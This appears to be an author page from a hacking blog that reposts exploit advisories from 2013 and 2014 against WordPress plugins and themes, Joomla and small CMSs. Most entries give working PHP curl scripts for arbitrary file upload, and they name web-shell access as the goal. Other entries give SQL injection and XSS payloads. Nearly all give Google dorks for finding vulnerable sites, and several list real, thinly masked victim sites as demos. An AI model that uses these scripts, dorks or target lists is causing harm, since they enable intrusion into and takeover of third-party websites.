1337mir

About 1337mir

So far 1337mir has created 49 entries.

WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

By |January 3rd, 2014|

Title : WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
Author : eX-Sh1Ne
Date : 23/11/2013
Category : Web Applications
Type : PHP
Vendor : http://themify.me/
Download : http://themify.me/themes/blogfolio
Tested : Mozilla, Chrome-> Windows
Vulnerability : Arbitrary File Upload
Dork : inurl:wp-content/themes/blogfolio/

Exploit:
<?php
$uploadfile="sh1ne.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > […]


WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
Author: iskorpitx
Date: 22/11/2013
Vendor Homepage: http://digitalzoomstudio.net
Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
Infected File: upload.php
Category: webapps
Google dork: inurl:/wp-content/plugins/dzs-videogallery/
Tested on : Windows/Linux
<?php
$uploadfile="";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file_field'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
uploaded file:
http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html


WP page-flip-image-gallery plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress page-flip-image-gallery plugins Remote File Upload Vulnerability
Author: Ashiyane Digital Security Team
Date: 12/06/2013
Vendor Homepage: http://pageflipgallery.com
Software Link : http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
Tested on: Windows/Linux

1)Exploit :
<?php
$uploadfile="file.php";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
2) Exploit demo :
http://arcticpackXging.com/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.panvXlkargroup.org/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.jamXma.it/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.icipiXi.ie/suiomh/wp-content/plugins/page-flip-image-gallery/upload.php
uploaded file:
http://[Target]/wp-content/uploads/file.php


Imaweb SQL injection Vulnerability

By |December 30th, 2013|

Exploit Title : imaweb SQL injection vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://www.imaweb.fr
Google Dork : intext:Réalisation du site Internet par Imaweb
Date: 2013-12-25
Tested on: Windows 7
discovered by : ACC3SS

Location :
localhost/public/index.php?act=photo_afficher&code=pub_phototheque2&num=[Sql Injection]
Demo:

joomla com_joomleague execute arbitrary PHP code Exploit

By |November 4th, 2013|

Exploit Title: joomla com_joomleague execute arbitrary PHP code Exploit
Google Dork: inurl:com_joomleague
Date: [01-11-2013]
Exploit Author: wantexz
Vendor Homepage: http://www.joomleague.net/
Software Link: http://www.joomleague.net/index.php?option=com_jdownloads&Itemid=104&view=viewdownload&catid=2359&cid=242&lang=en
Version: com_joomleague
Tested on: [wantexz]
CVE :
target tested: http://badminton.loiret.free.fr//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php

POC: 
<?php
$options = getopt('u:f:');

if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f IDC.php\n
-u http://target.com/ The full path to Joomla!
-f IDC.php The name of the file to create.\n");

$url = $options['u'];
$file = $options['f'];
$shell = […]


Catmis Sql Injection Vulnerability

By |November 4th, 2013|

Exploit Title : Catmis Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://code.google.com/p/catmis/
Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
Date: 2013/11/102

Tested on: Windows 7 , Linux
——————————————————————-
Exploit : Sql Injection
Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection]
Proof:
http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page=’
https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page=’
http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page=’
http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page=’
http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page=’


Google Dorks For SQL Injection

By |October 10th, 2013|

1500+ Google dorks for SQL injection.
Definition of Google dorks: advanced Google searches used to find security loopholes on websites and allow hackers to break into or disrupt the site.

list below:


WordPress fgallery plus Plugin Xss vulnerabilities

By |October 10th, 2013|

Exploit Title : WordPress fgallery plus Plugin Xss vulnerabilities
Author : Iranian Exploit DataBase
Discovered By : IeDb
Email : [email protected]
Home : http://iedb.ir – http://iedb.ir/acc
Software Link : http://wordpress.org/
Security Risk : High
Tested on : Linux
Dork : inurl:/plugins/fgallery_plus/
Exploit :
http://sXXom/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
Dem0 :

http://alXXdk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3[xss]
http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3[xss]
Tnx To : TaK.FaNaR – l4tr0d3ctism – r3d_s0urc3 – Bl4ck M4n – Medrik – Dj.TiniVini –
dr.koderz – z3r0 – Mr Zer0
B3hz4d […]


WordPress Lazy SEO plugin Shell Upload Vulnerability

By |October 10th, 2013|

Exploit Title : WordPress Lazy SEO plugin Shell Upload Vulnerability
Exploit Author : Ashiyane Digital Security Team
Discovered By : ACC3SS
Google Dork : inurl:/wp-content/plugins/lazy-seo/
Date: 2013/09/21
Vendor Homepage : http://wordpress.org/plugins/lazy-seo
Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
Version : 1.1.9
Tested on: Windows

Location:
Site/wp-content/plugins/lazy-seo/lazyseo.php
1.Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
2.Click on Browse…
3.Select Shell Code
3.Complete the fields
4.Press Enter
5.Shell Address : wp-content/plugins/lazy-seo/Shell.php

Demo:
http://www.dXus.com/wp-content/plugins/lazy-seo/lazyseo.php
http://noteclX.com/wp-content/plugins/lazy-seo/lazyseo.php


Actualizer CMS – Multiple Vulnerabilities

By |October 10th, 2013|

Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:”Powered by Actualizer & Heuristic”
Contact: [email protected]

1. Blind SQL Injection
host/galeria/galeria-2 /gal,1 ‘%20or%20’1’=’2.html – false
host/galeria/galeria-2/gal,1 ‘%20or%20’1 ‘= ‘ 1. html – true
PoC:
http://site/galeria/galeria-2/gal,1 ‘%20or%20 ‘1’=’ 2. html
2. Cross Site Scripting
host/katalog/nowosci/archiwum/year,”xss
PoC:
site/katalog/nowosci/archiwum/year,”xss
3. Full Path Disclosure
host/newsletter.php
POST: action=save&cat=666%email[][email protected]&imie=devil

host/konto/rejestracja
POST (multipart): login=1
